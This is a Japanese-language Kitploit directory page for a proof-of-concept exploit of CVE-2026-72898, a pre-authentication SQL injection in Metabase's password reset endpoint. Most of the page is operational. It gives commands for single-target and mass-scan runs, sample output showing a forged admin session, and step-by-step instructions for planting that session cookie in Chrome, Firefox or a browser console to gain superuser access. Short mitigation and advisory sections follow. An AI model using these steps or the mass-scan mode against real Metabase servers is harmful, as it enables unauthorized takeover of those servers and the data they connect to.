Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-72898 — CVE-2026-72898の概念実証(PoC)エクスプロイトです。Metabaseのパスワードリセットエンドポイントに存在する未認証のSQLインジェクションを悪用し、管理者セッションを偽造して完全な乗っ取りを実現します。認可されたテスト向けに、単一ターゲットモードとマススキャンモードを備えています。 | Kitploit
ツール/GitHubGitHub/4minx/cve-2026-72898
脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHub4minx/cve-2026-72898

CVE-2026-72898

CVE-2026-72898の概念実証(PoC)エクスプロイトです。Metabaseのパスワードリセットエンドポイントに存在する未認証のSQLインジェクションを悪用し、管理者セッションを偽造して完全な乗っ取りを実現します。認可されたテスト向けに、単一ターゲットモードとマススキャンモードを備えています。

リポジトリを見る
15日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-72898 PoC : Metabase の未認証SQLインジェクション

Metabase 事前認証SQLインジェクションによる管理者乗っ取り

CVE-2026-72898(Metabase のパスワードリセットエンドポイントにおける重大な未認証SQLインジェクション)の概念実証です。このPoCは、偽造した管理者セッションの行を core_session テーブルに注入し、その行を使って資格情報を一切使わずに完全な管理者セッションを検証します。

注記: このPoCは、許可されたセキュリティテストおよび研究専用です。CVE-2026-72898 は CISA Known Exploited Vulnerabilities (KEV) カタログに掲載されており、実際に悪用が確認されています。システムをテストする前に、適用されるすべての法律を遵守し、書面による許可を取得する責任はあなたにあります。


脆弱性情報

  • CVE: CVE-2026-72898
  • タイプ: CWE-89 SQLコマンドに使用される特殊要素の不適切な無効化('SQLインジェクション')
  • CVSS 4.0: 10.0(Critical)
  • 認証: 未認証(事前認証、リモート、攻撃複雑性は低)
  • CISA KEV: 2026-08-11 追加(実際に悪用が確認済み)
  • 影響を受けるバージョン(Metabase):
    • x.58.0 から < x.58.24
    • x.59.0 から < x.59.21
    • x.60.0 から < x.60.17
    • x.61.0 から < x.61.11
    • x.62.0 から < x.62.9
    • x.63.0 から < x.63.5
  • 修正版: x.58.24, x.59.21, x.60.17, x.61.11, x.62.9, x.63.5

要件

  • Python 3.8+ と requests ライブラリ
  • ターゲット: 影響を受ける、インターネットに公開された Metabase インスタンス

依存関係のインストール:

root@kitploit:~
pip install requests

使用方法

単一ターゲット

root@kitploit:~
python cve-2026-72898_poc.py -t http://192.168.1.1:3000

大量スキャン

root@kitploit:~
python cve-2026-72898_poc.py -T targets.txt

オプション


出力例

root@kitploit:~
 CVE-2026-72898 | Metabase SQLi PoC
----------------------------------------

Target: http://192.168.1.1:3000
 [1] GET http://192.168.1.1:3000/ -> 200
 [2] POST /api/session/reset_password -> 400
      (expected: Invalid reset token, SQLi executed)
 [3] GET /api/user/current -> 200
[+] VULNERABLE
    session id : 242x6a6cx-5388-aaf8-bl5c-afi46ic02198
    key_hashed : 0f6005cbexf08948c08dd9272b439xfecwabxb4ntedd83bagb6337bx849b6xyi6
    admin email: [email protected]

ステップ2で Invalid reset token による 400 が返るのは想定どおりです。これはSQLiペイロードが実行され、レスポンスが短絡されたことを意味します。ステップ3で /api/user/current が 200 を返せば、偽造セッションが有効であることが確認できます。

結果ステータス: vulnerable | not_vulnerable | patched | root_not_200 | unknown | error


偽造セッションの使用

Metabase は metabase.SESSION クッキーからセッションを読み取るため、そのクッキーを追加することで偽造管理者としてWeb UIにログインできます:

Google Chrome / Edge / Chromium

  1. PoCを実行し、出力された session id をコピーします
  2. http://TARGET/ を開き、F12(DevTools)を押します
  3. Application(Edge: Application、Chrome: Application)→ Storage → Cookies → ターゲットホストを選択します
  4. +(Cookieを追加)ボタンをクリックし、次のように入力します:
    • Name: metabase.SESSION
    • Value: <SESSION_ID>(PoCが出力した値)
    • Domain: ターゲットのホスト/IP(例: 192.168.1.1 または .example.com)
    • Path: /
    • 有効期限を遠い将来に設定します(または "Session" をクリック)
  5. Save をクリックし、ページを更新します
  6. これでスーパーユーザーとして認証されます — 管理者ギアアイコンが表示されます

Firefox

  1. PoCを実行し、出力された session id をコピーします
  2. F12 → Storage タブ → Cookies → ターゲットホストを選択します
  3. 右クリック → Add/Edit Cookie で次を追加します:
    • Name: metabase.SESSION
    • Value: <SESSION_ID>
    • Path: /
    • HttpOnly: チェックを外す(JSが設定するため)
    • Secure: 平文HTTPの場合はチェックを外す
  4. 保存してページを更新します

代替: Cookieエディタ拡張機能

任意のCookie編集拡張機能(例: Cookie-Editor)を使用して、ターゲットドメインに偽造した値を持つ metabase.SESSION クッキーを追加し、その後更新します。

ブラウザコンソールから

root@kitploit:~
fetch('/api/user/current', { headers: { 'X-Metabase-Session': '<SESSION_ID>' } })
  .then(r => r.json()).then(console.log)

緩和策

  • 修正済みバージョン(x.58.24 / x.59.21 / x.60.17 / x.61.11 / x.62.9 / x.63.5 以降)にアップグレードする
  • すぐにアップグレードできない場合は、ネットワーク/WAF層で /api/session/reset_password をブロックする
  • アップグレード後: すべてのアクティブセッションを無効化し、接続先データベースの資格情報をローテーションし、管理者アカウントとAPIキーに予期しない変更がないか確認し、Metabaseのアクティビティ/クエリ履歴を監査する

☕ サポート

このプロジェクトが役立ったなら、開発の支援を検討してください:

USDT (TRC-20)

TDCPYioWbZW4iyMCuHhJeFsUZJ88YqZWc1

USDT TRC-20 QR

ETH (ERC-20)

0xf6eA555f95ed5b356fF7a90E6461EbBF6ce105cE

Ethereum QR


参考情報

  • Metabase Security Advisory (GHSA-vwf4-m7j8-wcjf)
  • Metabase Security Update
  • CVE.org Record – CVE-2026-72898
  • NVD – CVE-2026-72898
  • CISA Known Exploited Vulnerabilities Catalog
  • Horizon3.ai – Metabase SQL Injection
  • The Hacker News – Metabase Zero-Day Exploited in Wild
  • Nuclei Template – Metabase Unauthenticated SQL Injection
ツールをダウンロード
引数説明デフォルト
-t, --target単一ターゲットのURL-
-T, --targetsターゲットURLを1行に1つずつ含むファイル-
-o, --output結果ファイル(タブ区切り: ターゲット、結果、ステータス、session_id、admin_email)-
--timeoutリクエストのタイムアウト(秒)15